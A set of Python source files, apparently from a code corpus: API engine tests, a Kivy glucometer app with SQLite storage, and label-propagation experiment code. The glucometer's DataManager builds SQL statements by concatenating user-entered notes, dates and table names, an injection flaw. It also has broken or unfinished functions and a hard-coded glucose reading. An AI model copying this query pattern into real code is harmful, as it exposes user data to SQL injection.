(2, 'jar', 2, 200),
))
def test_delete(get_client, user_id, resource, id_, expected_status):
'''
Test if DELETE on object returns correct status
'''
init_cookies_with_user_id()
client = get_client(auth_required=True)
client.login({'user_id': user_id})
data, status, headers = client.delete(resource, id_)
assert status == expected_status
```
#### File: tests/pg_storage/test_custom_query.py
```python
from example import cookies
from tests.helpers.blargh_config import init_pg_world
import pytest
from copy import deepcopy
from blargh import engine
from blargh import exceptions
from blargh.data_model.fields import Scalar, Rel
# USED BY BOTH
def set_query_class(query_cls):
'''
Make tester use CLS as query
'''
def wrap_storage(f):
def wrapped_storage(*args, **kwargs):
old_storage = f(*args, **kwargs)
new_storage = engine.PGStorage(old_storage._conn, old_storage._schema, query_cls=query_cls)
return new_storage
return wrapped_storage
engine.config._config['create_storage'] = wrap_storage(engine.config._config['create_storage'])
# WITH SHELF
shelf_select = '''
WITH
values (id, position) AS (
VALUES (1, 'top'), (2, 'bottom')
)
SELECT *
FROM values
'''
class ReadonlyResource(exceptions.e400):
code = 'resource_is_readonly'
# expected error message
shelf_is_readonly = {'error': {'code': 'RESOURCE_IS_READONLY', 'details': {'object_name': 'shelf'}}}
class WithShelf(engine.storage.pg.Query):
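    """Query subclass exposing a read-only 'shelf' resource backed by a hard-coded
    VALUES list instead of a real table; any write attempt raises ReadonlyResource."""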
def table_columns(self, name):
if name == 'shelf':
return ('id', 'position')
return super().table_columns(name)
def _select_all_sql(self, name):
if name == 'shelf':
return shelf_select
return super()._select_all_sql(name)
    # NOTE: upsert/delete are not necessary (this will raise e400 either way),
# but this way it is clearer
def upsert(self, name, data):
if name == 'shelf':
raise ReadonlyResource(object_name='shelf')
return super().upsert(name, data)
def delete(self, name, pkey_val):
if name == 'shelf':
raise ReadonlyResource(object_name='shelf')
        return super().delete(name, pkey_val)
def default_pkey_expr(self, name, column_name):
if name == 'shelf':
raise ReadonlyResource(object_name='shelf')
return super().default_pkey_expr(name, column_name)
def init_cookies_with_shelf():
# 1. Change data model
dm = deepcopy(cookies.dm)
shelf = dm.create_object('shelf')
shelf.add_field(Scalar('id', pkey=True, type_=int))
shelf.add_field(Scalar('position', pkey=False))
jar = dm.object('jar')
shelf.add_field(Rel('jars', stores=jar, multi=True))
dm.object('jar').add_field(Rel('shelf', stores=shelf, multi=False))
dm.connect(shelf, 'jars', jar, 'shelf')
# 2. Init world
init_pg_world(dm)
# 3. Modify jar table,
conn = engine.world().storage._conn
conn.cursor().execute('''
ALTER TABLE jar ADD COLUMN shelf integer CHECK (shelf IN (1, 2))
''')
conn.commit()
# 4. Set new class
set_query_class(WithShelf)
@pytest.mark.parametrize("method, expected_status, args, kwargs, expected_data", (
# GET should work as usual
('get', 200, ('shelf',), {}, [{'id': 1, 'position': 'top', 'jars': []},
{'id': 2, 'position': 'bottom', 'jars': []}]),
('get', 200, ('shelf',), dict(depth=0), [1, 2]),
('get', 200, ('shelf', 2), {}, {'id': 2, 'position': 'bottom', 'jars': []}),
('get', 200, ('shelf',), dict(filter_={'position': 'top'}), [{'id': 1, 'position': 'top', 'jars': []}]),
('get', 400, ('shelf',), dict(filter_={'jars': []}), None), # no searching by multi rel fields
# PATCHing shelf/jar relation is allowed in both ways
('patch', 200, ('jar', 1, {'shelf': 1}), {}, {'id': 1, 'cookies': [1, 2], 'shelf': 1}),
('patch', 200, ('shelf', 1, {'jars': [1, 2]}), {}, {'id': 1, 'position': 'top', 'jars': [1, 2]}),
# POSTING fresh jars on shelves is also possible in both ways
('post', 201, ('jar', {'shelf': 1}), {}, {'id': 3, 'cookies': [], 'shelf': 1}),
('patch', 200, ('shelf', 2, {'jars': [{}, {}]}), {}, {'id': 2, 'position': 'bottom', 'jars': [3, 4]}),
# PUTing jars is fine as well
('put', 201, ('jar', 3, {'shelf': 2}), {}, {'id': 3, 'cookies': [], 'shelf': 2}),
# POST/PUT/DELETE/PATCH on "stored" shelf field are not allowed
('patch', 400, ('shelf', 1, {'position': 'middle'}), {}, shelf_is_readonly),
('post', 400, ('shelf', {'position': 'middle'}), {}, shelf_is_readonly),
('put', 400, ('shelf', 1, {'position': 'middle'}), {}, shelf_is_readonly),
('put', 400, ('shelf', 3, {'position': 'middle'}), {}, shelf_is_readonly),
('delete', 400, ('shelf', 1), {}, shelf_is_readonly),
('delete', 404, ('shelf', 4), {}, None), # 404 goes first
))
def test_shelf_1(get_client, method, expected_status, args, kwargs, expected_data):
'''
Test "simple" shelf case - always starting from basic cookies situation,
test_shelf_2 tests jars already on shelves
'''
init_cookies_with_shelf()
client = get_client()
data, status, headers = getattr(client, method)(*args, **kwargs)
assert status == expected_status
if expected_data is not None:
assert data == expected_data
@pytest.mark.parametrize("method, expected_status, args, kwargs, expected_data", (
# GET
('get', 200, ('shelf',), {}, [{'id': 1, 'position': 'top', 'jars': [1]},
{'id': 2, 'position': 'bottom', 'jars': [2]}]),
('get', 200, ('shelf', 1), dict(depth=2),
{'id': 1, 'position': 'top', 'jars': [{'id': 1, 'cookies': [1, 2], 'shelf': 1}]}),
# Add another jar to shelf
('patch', 200, ('shelf', 1, {'jars': [1, {}]}), {}, {'id': 1, 'position': 'top', 'jars': [1, 3]}),
# Remove jar
('patch', 200, ('shelf', 1, {'jars': []}), {}, {'id': 1, 'position': 'top', 'jars': []}),
('patch', 200, ('jar', 2, {'shelf': None}), {}, {'id': 2, 'cookies': [3]}),
))
def test_shelf_2(get_client, method, expected_status, args, kwargs, expected_data):
'''
Test with jars already on shelves
'''
init_cookies_with_shelf()
client = get_client()
# Put jars on shelves
assert client.patch('jar', 1, {'shelf': 1})[1] == 200
assert client.patch('jar', 2, {'shelf': 2})[1] == 200
# Test
data, status, headers = getattr(client, method)(*args, **kwargs)
assert status == expected_status
if expected_data is not None:
assert data == expected_data
# # ONLY DONUTS
# not_a_donut = "THIS IS NOT A DONUT!!!"
# class OnlyDonuts(engine.storage.pg.Query):
# def upsert(self, name, data):
# if 'type' in data and data['type'] != 'donut':
# raise exceptions.e400(not_a_donut)
# return super().upsert(name, data)
#
#
# @pytest.mark.parametrize("method, expected_status, args", (
# ('post', 201, ('cookie', {'type': 'donut'})),
# ('post', 400, ('cookie', {'type': 'not_a_donut'})),
# ('post', 201, ('jar', {'cookies': [{}, {}]})),
# ('post', 201, ('jar', {'cookies': [{'type': 'donut'}, {'type': 'donut'}, {}]})),
# ('post', 400, ('jar', {'cookies': [{'type': 'donut'}, {'type': 'not_a_donut'}, {}]})),
# ('patch', 200, ('cookie', 1, {'type': 'donut'})),
# ('patch', 400, ('cookie', 1, {'type': 'not_a_donut'})),
# ))
# def test_only_donuts(get_client, method, expected_status, args):
# init_pg_world(cookies.dm)
# client = get_client()
# set_query_class(OnlyDonuts)
#
# data, status, headers = getattr(client, method)(*args)
#
# assert status == expected_status
#
# if status == 400:
# assert data == {'msg': not_a_donut}
```
#### File: tests/raw/test_exception.py
```python
from blargh import exceptions
from blargh.engine import Engine, dm
from blargh.data_model.fields import Scalar
from example import cookies
import pytest
class ExceptionRaiser:
'''Each method raises exception of the same name'''
def BadParamValue():
Engine.get('cookie', 1, depth=-1)
def SearchForbidden():
Engine.get('jar', filter_={'cookies': [1, 2]})
def FieldIsReadonly():
# Modify data model - cookie.type is readonly
dm().object('cookie').field('type').readonly = True
# ... and yet we still try to change it!
Engine.patch('cookie', 1, {'type': 'donut'})
def FieldUpdateForbidden():
# Modify data model - we close our jars ...
dm().object('jar').field('cookies')._writable = False
# ... and than try to remove the cookie from the jar
Engine.patch('cookie', 1, {'jar': None})
def FieldDoesNotExist():
Engine.post('cookie', {'bad_field_name': 7})
def e404():
Engine.patch('cookie', 1, {'jar': 7})
def ProgrammingError():
# field 'type' already exists
dm().object('cookie').add_field(Scalar('type'))
def e500():
# Note: maybe 4** would be more appropriate for bad 'auth' value, but
# we assume there is an intermediate layer between Engine and "user with auth",
# so bad auth on this level looks like a 500
Engine.get('jar', 1, auth='aaa')
params = [[getattr(exceptions, name), getattr(ExceptionRaiser, name)]
for name in ExceptionRaiser.__dict__ if not name.startswith('__')]
@pytest.mark.parametrize('exception, method', params)
def test_exceptions(init_world, exception, method):
init_world(cookies.dm)
with pytest.raises(exception):
method()
```
#### File: blargh/tests/test_get.py
```python
from .helpers.get import expected_get_data
from .helpers.blargh_config import init_dict_world, init_pg_world
from blargh.engine import world
from example import family, cookies
import pytest
'''
Test if there is no stupid internal GET cache (there once was)
'''
def test_get_cache(get_client):
# We use DictWorld only because we need to touch it's internals to imitate "other" application.
init_dict_world(family.dm)
client = get_client()
    # 1. Initial check - first child should have name 'c1' (if it has a different one,
    # something is seriously wrong and the rest of the test makes no sense)
data, status_code, *headers = client.get('child', 1)
assert data['name'] == 'c1'
# 2. Modify data, without any blargh interface (that could clear potential cache)
world().storage._commited['child'][1]['name'] = 'new_c1_name'
# 3. Check
data, status_code, *headers = client.get('child', 1)
assert data['name'] == 'new_c1_name'
@pytest.mark.parametrize("method, args", (
('post', ('cookie', {})),
('put', ('cookie', 1, {})),
('put', ('cookie', 7, {})),
))
def test_implicit_fields_post_put(get_client, method, args):
'''
    Check if fields set in an implicit way after POST/PUT (i.e. database defaults) are returned
'''
# INIT
init_pg_world(cookies.dm)
client = get_client()
# Add default column value
world().storage._conn.cursor().execute('''
ALTER TABLE cookie
ALTER COLUMN jar SET DEFAULT 1;
''')
data, status, headers = getattr(client, method)(*args)
assert status == 201
assert data['jar'] == 1
def test_implicit_fields_patch(get_client):
'''
    Check if fields set in an implicit way after PATCH (i.e. by database triggers) are returned
'''
# INIT
init_pg_world(cookies.dm)
client = get_client()
# Add trigger changing type after update
world().storage._conn.cursor().execute('''
CREATE FUNCTION pg_temp.new_cookie_type() RETURNS trigger AS $new_cookie_type$
BEGIN
NEW.type = 'type_set_by_trigger';
RETURN NEW;
END;
$new_cookie_type$ LANGUAGE plpgsql;
CREATE TRIGGER change_cookie_type
BEFORE UPDATE ON pg_temp.cookie
FOR EACH ROW EXECUTE PROCEDURE pg_temp.new_cookie_type();
''')
# Create fresh cookie
data, status, headers = client.put('cookie', 4, {'type': 'donut'})
assert status == 201
assert data['type'] == 'donut'
# Make sure it's still a donut
data, status, headers = client.get('cookie', 4)
assert status == 200
assert data['type'] == 'donut'
# Patch it with some data and check if we got triggered type
data, status, headers = client.patch('cookie', 4, {'type': 'doesnt matter'})
assert status == 200
assert data['type'] == 'type_set_by_trigger'
# Make sure it's still a triggered type
data, status, headers = client.get('cookie', 4)
assert status == 200
assert data['type'] == 'type_set_by_trigger'
'''
Test returned data
'''
get_params = [
(1, 'child', dict(id_=1, depth=0)), # noqa: E241
(2, 'child', dict(id_=1, depth=1)), # noqa: E241
(3, 'child', dict(id_=1, depth=2)), # noqa: E241
(4, 'child', dict(id_=1, depth=3)), # noqa: E241
(5, 'child', dict(id_=1, depth=4)), # noqa: E241
(6, 'child', dict(depth=0)), # noqa: E241
(7, 'child', dict(depth=1)), # noqa: E241
(8, 'child', dict(filter_=dict(name='c1'))), # noqa: E241
(9, 'child', dict(filter_=dict(name='NIEMA'))), # noqa: E241
(10, 'female', dict(depth=1, filter_=dict(name='f1'))), # noqa: E241
# Note: filter is 'id', but get param is 'id_' - this is intended, 'id' is an external name
(11, 'female', dict(depth=1, filter_={'id': 2})), # noqa: E241
(12, 'child', dict(depth=0, filter_={'father': 1})), # noqa: E241
(13, 'child', dict(depth=0, filter_={'father': 1, 'name': 'c1'})), # noqa: E241
(14, 'child', dict(depth=0, filter_={'father': 1, 'name': 'c2'})), # noqa: E241
(15, 'female', dict(depth=0, filter_={'name': 'f1'})), # noqa: E241
(15, 'female', dict(depth=0, filter_={'husband': 1})), # noqa: E241
(15, 'female', dict(depth=0, filter_={'husband': 1, 'name': 'f1'})), # noqa: E241
(15, 'female', dict(depth=0, filter_={'husband': 1, 'id': 1})), # noqa: E241
(15, 'female', dict(depth=0, filter_={'husband': 1, 'id': 1, 'name': 'f1'})), # noqa: E241
(0, 'female', dict(depth=0, filter_={'husband': 1, 'id': 1, 'name': 'f2'})), # noqa: E241
(0, 'female', dict(depth=0, filter_={'husband': 3})), # noqa: E241
(0, 'female', dict(depth=0, filter_={'husband': 1, 'name': 'f2'})), # noqa: E241
(0, 'female', dict(depth=0, filter_={'husband': 1, 'id': 2})), # noqa: E241
(0, 'female', dict(depth=0, filter_={'husband': 1, 'id': 2})), # noqa: E241
(16, 'male', dict(depth=0, filter_={'name': 'm1'})), # noqa: E241
(16, 'male', dict(depth=0, filter_={'wife': 1})), # noqa: E241
(16, 'male', dict(depth=0, filter_={'wife': 1, 'name': 'm1'})), # noqa: E241
(16, 'male', dict(depth=0, filter_={'wife': 1, 'id': 1})), # noqa: E241
(16, 'male', dict(depth=0, filter_={'wife': 1, 'id': 1, 'name': 'm1'})), # noqa: E241
(0, 'male', dict(depth=0, filter_={'wife': 1, 'id': 2, 'name': 'm1'})), # noqa: E241
(0, 'male', dict(depth=0, filter_={'wife': 3})), # noqa: E241
(0, 'male', dict(depth=0, filter_={'wife': 1, 'name': 'm2'})), # noqa: E241
(0, 'male', dict(depth=0, filter_={'wife': 1, 'id': 2})), # noqa: E241
(17, 'child', dict(depth=0, filter_={'father': 1, 'mother': 1})), # noqa: E241
(18, 'child', dict(depth=0, filter_={'father': 1, 'mother': 2})), # noqa: E241
(19, 'child', dict(depth=0, filter_={'father': 2, 'mother': 2})), # noqa: E241
(0, 'child', dict(depth=0, filter_={'father': 2, 'mother': 1})), # noqa: E241
(0, 'child', dict(depth=0, filter_={'father': 3, 'mother': 1})), # noqa: E241
(0, 'child', dict(depth=0, filter_={'father': 1, 'mother': 3})), # noqa: E241
]
@pytest.mark.parametrize("data_id, resource, kwargs", get_params)
def test_base_get_family(init_world, get_client, resource, kwargs, data_id):
# Init
init_world(family.dm)
client = get_client()
# Fetch tested data
data, status_code, *headers = client.get(resource, **kwargs)
# Expected data
expected_data = expected_get_data(data_id, client)
# Test
assert status_code == 200
assert data == expected_data
``` |
{
"source": "johnyburd/glucometer",
"score": 2
} |
#### File: glucometer/classes/bg_screen.py
```python
from kivy.uix.screenmanager import Screen
from kivy.clock import Clock
from kivy.uix.button import Button
from kivy.uix.label import Label
from kivy.uix.dropdown import DropDown
from kivy.uix.popup import Popup
from .data_manager import DataManager
from .blood_glucose_tester import BloodGlucoseTester
from kivy.lang import Builder
Builder.load_file('kvfiles/bg_screen.kv')
class BGScreen(Screen):
def __init__(self, **kwargs):
super(BGScreen, self).__init__(**kwargs)
self.bgt = BloodGlucoseTester(self)
def open_popup(self):
popup = BGPopup(self.bgt)
popup.open()
class BGPopup(Popup):
def __init__(self, bgtester, **kwargs):
super(BGPopup, self).__init__(**kwargs)
self.bgt = bgtester
def start_pb(self):
event = Clock.schedule_interval(self.update_pb, 1 / 60.)
def update_pb(self, dt):
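        # Advance the progress bar; once full, show a (hard-coded) BG reading and
        # stop the scheduled callback by returning False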
self.ids.pb.value = self.ids.pb.value + (1/3.)
if self.ids.pb.value >= 100:
self.display_BG('106')
self.ids.pb.value = 0
return False
def display_BG(self, value):
popup = Popup(title='BG',
content=Label(text=value,font_size=25),
size_hint=(None, None), size=(125, 125))
popup.bind(on_dismiss=self.dismiss_both)
popup.open()
def dismiss_both(self,instance):
self.dismiss()
return False
```
#### File: glucometer/classes/data_manager.py
```python
import sqlite3 as lite
import sys
#from scipy.stats import linregress
from numpy import empty
import math
import datetime
class DataManager:
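    """SQLite-backed storage for blood glucose entries and meter calibration points."""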
def __init__(self):
self.con = lite.connect('data.db')
cur = self.con.cursor()
# Table for storing date, time, blood glucose value, carbs, bolus, and notes
cur.execute("CREATE TABLE IF NOT EXISTS Data(Id INTEGER PRIMARY KEY, DateColumn date, Bg INT, Carbs INT, Bolus INT, Notes Text)")
# Table for storing points with which to calibrate the meter.
cur.execute("CREATE TABLE IF NOT EXISTS CalibData(ADC INT, Actual INT)")
# Adds a new data point to the "Data" table
def new_entry(self, date, bg, carbs, bolus, notes):
self.con.execute("INSERT INTO data(DateColumn, Bg, Carbs, Bolus, Notes) VALUES ('"+date+"',"+str(bg)+","+str(carbs)+","+str(bolus)+",'"+notes+"')")
self.con.commit()
# Deletes an entry from the "Data" table
def delete_entry(self, date, bg, carbs, bolus, notes ):
self.con.execute("DELETE FROM data WHERE Id =(SELECT MIN(Id) FROM data WHERE DateColumn='%s' AND Bg=%d AND Carbs =%d AND Bolus =%d AND Notes='%s')" % (date, bg, carbs, bolus, notes))
self.con.commit()
# Adds a new data point to the "CabibData" table
def new_calib_entry(self, adc, actual):
self.con.execute("INSERT INTO CalibData(ADC, Actual) VALUES ("+str(adc)+","+str(actual)+")")
self.con.commit()
# Calculates linear regression on the "CalibData" table in the database. Returns line as a lambda object
def get_line(self):
rows = self.get_whole_table("CalibData")
x = empty([len(rows)])
y = empty([len(rows)])
index = 0
for row in rows:
x[index] = row["ADC"]
y[index] = row["Actual"]
index += 1
slope, intercept, r_value, p_value, std_err = linregress(x,y)
return lambda x: slope*x + intercept
# Returns the requested table as a dictonary object
def get_whole_table(self, table):
with self.con:
self.con.row_factory = lite.Row
cur = self.con.cursor()
cur.execute("SELECT * FROM " + table)
#SELECT * FROM data ORDER BY datetime(dateColumn);
return cur.fetchall()
# Returns the requested table ordered by a column named datetime
def get_whole_table_sorted(self, table):
with self.con:
self.con.row_factory = lite.Row
cur = self.con.cursor()
cur.execute("SELECT * FROM " + table + " ORDER BY datetime(dateColumn)")
return cur.fetchall()
# Deletes the sqlite table passed
def delete_table(self, table):
cur = self.con.cursor()
cur.execute("DROP TABLE IF EXISTS " + table)
# Sorts Table into chronological order TODO doesn't work
def sort_data_table(self):
data_table = self.get_whole_table('Data')
datetime_list = []
for entry in data_table:
datetime_list.append(self.str_to_date(str(entry["Date"]),str(entry["Time"])))
datetime_list.sort()
#self.delete_table("Data")
for entry in datetime_list:
self.new
return datetime_list
    # Converts strings in the format m/d/y or m/d/y, h:m to a datetime object TODO deprecated
def str_to_date(self, strdate):
if '/' in strdate:
split_date = strdate.split('/')
m = int(split_date[0])
d = int(split_date[1])
y = int(split_date[2])
h = 0
mins = 0
if y < 100:
y = int('20' + str(y))
else:
try:
dateobj = datetime.datetime.strptime( strdate, "%Y-%m-%d %H:%M" )
return dateobj
except:
pass
try:
dateobj = datetime.datetime.strptime( strdate, "%Y-%m-%d" )
return dateobj
except:
pass
return datetime.datetime(year=y, month=m, day=d, hour=h, minute=mins)
# Testing stuff
if __name__ == "__main__":
bgm = DataManager()
rows = bgm.get_whole_table("Data")
data = (
('2016-12-01 11:44', 98, 0, 0, 'bg of 98'),
('2016-11-03 03:45', 98, 36, 9, 'bg of 98'),
('2016-11-03 12:45', 94, 24, 6, 'same notes'),
('2016-11-03 23:45', 112, 26, 7, 'notes these are them'),
('2016-10-04 23:45', 86, 13, 3, 'aeu'),
('2016-09-05 14:45', 134, 6, 2, 'none'),
('2016-10-06 23:45', 99, 6, 2, 'it was 99 today'),
('2016-10-07 23:45', 109, 12, 3, 'tomorrow is 140'),
('2016-11-08 12:45', 103, 140, 35, 'wow thats high'),
('2016-11-09 23:45', 109, 60, 15, 'testing'),
('2016-11-10 23:45', 94, 44, 11, '44, 11'),
('2016-11-03 18:45', 117, 6, 2, 'notesnotesnotes'),
('2016-11-03 19:45', 117, 6, 2, 'notesnotesnotes'),
('2016-11-04 12:45', 111, 26, 7, ' '),
('2016-11-04 20:45', 117, 6, 2, 'notesnotesnotes'),
('2016-11-05 21:45', 111, 26, 7, ' '),
('2016-11-05 22:45', 111, 26, 7, ' ')
)
#table = bgm.sort_data_table()
table = bgm.get_whole_table_sorted("Data")
for thing in table:
print thing
bgm.delete_table('Data')
bgm = DataManager()
for point in data:
bgm.new_entry(point[0],point[1],point[2],point[3], point[4])
#for row in rows:
# print "%s %s %s" % (row["Date"], row["Bg"], row["Carbs"])
#print point[0]
#bgm.delete_table('calibdata')
#bgm.new_calib_entry(1, 1)
#bgm.new_calib_entry(20, -100)
#test = bgm.get_line()
#print test(3700)
```
#### File: glucometer/classes/data_screen.py
```python
from kivy.clock import Clock
from kivy.uix.screenmanager import Screen
from kivy.uix.button import Button
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.core.window import Window
from kivy.uix.boxlayout import BoxLayout
from .data_manager import DataManager
from kivy.properties import BooleanProperty
from kivy.lang import Builder
Builder.load_file('kvfiles/data_screen.kv')
class DeleteDialoguePopup(Popup):
def __init__(self, ent, **kwargs):
super(DeleteDialoguePopup, self).__init__(**kwargs)
self.entry = ent
def delete(self):
self.entry.delete()
class DateRow(BoxLayout):
def __init__(self, date, **kwargs):
super(DateRow, self).__init__(**kwargs)
dm = DataManager()
dateobj = dm.str_to_date(date)
self.ids.date.text = "%s %s, %s" % (dateobj.strftime('%B')[:3], dateobj.day, dateobj.year)
class EntryRow(BoxLayout):
widths_correct = BooleanProperty(False)
def __init__(self, date, time, b, c, bo, n, **kwargs):
super(EntryRow, self).__init__(**kwargs)
self.dm = DataManager()
self.datetime = date + ' ' + time
self.bg = b
self.carbs = c
self.bolus = bo
self.notes = n
i = self.ids
i.time.text = time
if b == 0:
i.bg.text = '--'
else:
i.bg.text = str(b)
if c == 0:
i.carbs.text = '--'
else:
i.carbs.text = str(c)
if bo == 0:
i.bolus.text = '--'
else:
i.bolus.text = str(bo)
i.notes.text = n
def refresh_widths(self):
i = self.ids
i.bg._label.refresh() # have to refresh to update texture size
i.carbs._label.refresh()
i.bolus._label.refresh()
i.notes._label.refresh()
i.layout.width = sum(x.width for x in self.ids.layout.children)
totalwidth = i.layout.width + i.time.width
print totalwidth
if totalwidth < (Window.width + i.deletebtn.width + i.editbtn.width):
            i.spacer.width = Window.width - totalwidth + i.deletebtn.width + i.editbtn.width
            self.refresh_widths()
def open_delete_dialogue_popup(self):
popup = DeleteDialoguePopup(self)
popup.open()
def delete(self):
self.dm.delete_entry(self.datetime, int(self.bg), int(self.carbs), int(self.bolus), self.notes)
class DataScreen(Screen):
def __init__(self, **kwargs):
super(DataScreen, self).__init__(**kwargs)
self.dm = DataManager()
self.entryrows = []
self.daterows = []
self.render_data()
Clock.schedule_once(self.update_row_widths, 8)
#self.refresh()
def render_data(self):
layout = self.ids.layout
rows = self.dm.get_whole_table_sorted("data")
lastdate = ""
rows.reverse()
for row in rows:
isodate = row["dateColumn"]
isodate_split = isodate.split(' ')
date = isodate_split[0]
time = isodate_split[1]
if date != lastdate:
lastdate = date
daterow = DateRow(date)
layout.add_widget(daterow)
self.daterows.append(daterow)
bg = row['Bg']
carbs = row['Carbs']
bolus = row['bolus']
notes = row['Notes']
entry = EntryRow(date, time, bg, carbs, bolus, notes)
layout.add_widget(entry)
self.entryrows.append(entry)
def refresh(self, *args):
for entry in self.entryrows:
self.ids.layout.remove_widget(entry)
for date in self.daterows:
self.ids.layout.remove_widget(date)
self.entryrows = []
self.render_data()
Clock.schedule_once(self.update_row_widths, 0.5)
def update_row_widths(self, *args):
for entry in self.entryrows:
entry.refresh_widths()
``` |
{
"source": "johny-c/incremental-label-propagation",
"score": 3
} |
#### File: ilp/algo/knn_graph_utils.py
```python
import numpy as np
from sklearn.metrics.pairwise import euclidean_distances
from scipy.sparse import coo_matrix
def squared_distances(X1, X2, L=None):
if L is None:
dist = euclidean_distances(X1, X2, squared=True)
else:
dist = euclidean_distances(X1.dot(L.T), X2.dot(L.T), squared=True)
return dist
def get_nearest(distances, n_neighbors):
n, m = distances.shape
neighbors = np.argpartition(distances, n_neighbors - 1, axis=1)
neighbors = neighbors[:, :n_neighbors]
return neighbors, distances[np.arange(n)[:, None], neighbors]
def find_nearest_neighbors(X1, X2, n_neighbors, L=None):
"""
Args:
X1 (array_like): [n_samples, n_features] input data points
X2 (array_like): [m_samples, n_features] reference data points
n_neighbors (int): number of nearest neighbors to find
L (array) : linear transformation for Mahalanobis distance computation
Returns:
tuple:
(array_like): [n_samples, k_samples] indices of nearest neighbors
(array_like): [n_samples, k_distances] distances to nearest neighbors
"""
dist = squared_distances(X1, X2, L)
if X1 is X2:
np.fill_diagonal(dist, np.inf)
n, m = X1.shape[0], X2.shape[0]
neigh_ind = np.argpartition(dist, n_neighbors - 1, axis=1)
neigh_ind = neigh_ind[:, :n_neighbors]
return neigh_ind, dist[np.arange(n)[:, None], neigh_ind]
def construct_weight_mat(neighbors, distances, shape, dtype):
n, k = neighbors.shape
rows = np.repeat(range(n), k)
cols = neighbors.ravel()
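    # Gaussian-style edge weights: exp(-distance) for each of the k neighbors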
weights = np.exp(-distances.ravel())
mat = coo_matrix((weights, (rows, cols)), shape, dtype)
return mat
```
#### File: ilp/experiments/var_stream_labeled.py
```python
import os
import numpy as np
from time import sleep
from sklearn.utils.random import check_random_state
from ilp.experiments.base import BaseExperiment
from ilp.helpers.data_fetcher import fetch_load_data, IS_DATASET_STREAM
from ilp.helpers.params_parse import parse_yaml, experiment_arg_parser
from ilp.constants import CONFIG_DIR
from ilp.helpers.log import make_logger
logger = make_logger(__name__)
class VarStreamLabeled(BaseExperiment):
def __init__(self, ratio_labeled_values, params, n_runs=1, isave=100):
super(VarStreamLabeled, self).__init__(name='srl',
config=params,
isave=isave, n_runs=n_runs,
plot_title=r'Influence of ratio of labels',
multi_var=True)
self.ratio_labeled_values = ratio_labeled_values
def pre_single_run(self, X_run, y_run, mask_labeled, n_burn_in, seed_run,
X_test, y_test, n_run):
config = self.config
ratio_labeled = config['data']['stream']['ratio_labeled']
save_dir = os.path.join(self.top_dir, 'srl_' + str(ratio_labeled))
stats_path = os.path.join(save_dir, 'run_' + str(n_run))
logger.info('\n\nExperiment: {}, ratio_labeled = {}, run {}...\n'.
format(self.name.upper(), ratio_labeled, n_run))
sleep(1)
self._single_run(X_run, y_run, mask_labeled, n_burn_in,
stats_path, seed_run, X_test, y_test)
def run(self, dataset_name, random_state=42):
config = self.config
X_train, y_train, X_test, y_test = fetch_load_data(dataset_name)
for n_run in range(self.n_runs):
seed_run = random_state * n_run
logger.info('\n\nRANDOM SEED = {} for data split.'.format(seed_run))
rng = check_random_state(seed_run)
if config['dataset']['is_stream']:
logger.info('Dataset is a stream. Sampling observed labels.')
# Just randomly sample ratio_labeled samples for mask_labeled
n_burn_in = config['data']['n_burn_in_stream']
for ratio_labeled in self.ratio_labeled_values:
config['data']['stream']['ratio_labeled'] = ratio_labeled
n_labeled = int(ratio_labeled*len(y_train))
ind_labeled = rng.choice(len(y_train), n_labeled,
replace=False)
mask_labeled = np.zeros(len(y_train), dtype=bool)
mask_labeled[ind_labeled] = True
X_run, y_run = X_train, y_train
config['data']['n_burn_in'] = n_burn_in
config.setdefault('options', {})
config['options']['random_state'] = seed_run
self.pre_single_run(X_run, y_run, mask_labeled, n_burn_in,
seed_run, X_test, y_test, n_run)
if __name__ == '__main__':
parser = experiment_arg_parser()
args = vars(parser.parse_args())
dataset_name = args['dataset'].lower()
config_file = os.path.join(CONFIG_DIR, 'var_stream_labeled.yml')
config = parse_yaml(config_file)
# Store dataset info
config.setdefault('dataset', {})
config['dataset']['name'] = dataset_name
config['dataset']['is_stream'] = IS_DATASET_STREAM.get(dataset_name, False)
N_RATIO_LABELED = config['data']['stream']['ratio_labeled'].copy()
experiment = VarStreamLabeled(N_RATIO_LABELED, params=config,
n_runs=args['n_runs'])
if args['plot'] != '':
experiment.load_plot(path=args['plot'])
else:
experiment.run(dataset_name)
```
#### File: ilp/helpers/data_fetcher.py
```python
import os
import gzip
import zipfile
from urllib import request
import yaml
import numpy as np
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from ilp.constants import DATA_DIR
CWD = os.path.split(__file__)[0]
DATASET_CONFIG_PATH = os.path.join(CWD, 'datasets.yml')
SUPPORTED_DATASETS = {'mnist', 'usps', 'blobs', 'kitti_features'}
IS_DATASET_STREAM = {'kitti_features': True}
def check_supported_dataset(dataset):
if dataset not in SUPPORTED_DATASETS:
raise FileNotFoundError('Dataset {} is not supported.'.format(dataset))
return True
def fetch_load_data(name):
print('\nFetching/Loading {}...'.format(name))
with open(DATASET_CONFIG_PATH, 'r') as f:
        datasets_configs = yaml.safe_load(f)
if name.upper() not in datasets_configs:
raise FileNotFoundError('Dataset {} not supported.'.format(name))
config = datasets_configs[name.upper()]
name_ = config.get('name', name)
test_size = config.get('test_size', 0)
if name_ == 'KITTI_FEATURES':
X_tr, y_tr, X_te, y_te = fetch_kitti()
elif name_ == 'USPS':
X_tr, y_tr, X_te, y_te = fetch_usps()
elif name_ == 'MNIST':
X_tr, y_tr, X_te, y_te = fetch_mnist()
X_tr = X_tr / 255.
X_te = X_te / 255.
elif name_ == 'BLOBS':
X, y = make_classification(n_samples=60)
X = np.asarray(X)
y = np.asarray(y, dtype=int)
if test_size > 0:
if type(test_size) is int:
t = test_size
print('{} has shape {}'.format(name_, X.shape))
print('Splitting data with test size = {}'.format(test_size))
X_tr, X_te, y_tr, y_te = X[:-t], X[-t:], y[:-t], y[-t:]
elif type(test_size) is float:
X_tr, X_te, y_tr, y_te = train_test_split(
X, y, test_size=test_size, stratify=y)
else:
raise TypeError('test_size is neither int or float.')
print('Loaded training set with shape {}'.format(X_tr.shape))
print('Loaded testing set with shape {}'.format(X_te.shape))
return X_tr, y_tr, X_te, y_te
else:
print('Loaded {} with {} samples of dimension {}.'
.format(name_, X.shape[0], X.shape[1]))
return X, y, None, None
else:
raise NameError('No data set {} found!'.format(name_))
print('Loaded training data with shape {}'.format(X_tr.shape))
print('Loaded training labels with shape {}'.format(y_tr.shape))
print('Loaded testing data with shape {}'.format(X_te.shape))
print('Loaded testing labels with shape {}'.format(y_te.shape))
return X_tr, y_tr, X_te, y_te
def fetch_usps(save_dir=None):
base_url = 'http://statweb.stanford.edu/~tibs/ElemStatLearn/datasets/'
train_file = 'zip.train.gz'
test_file = 'zip.test.gz'
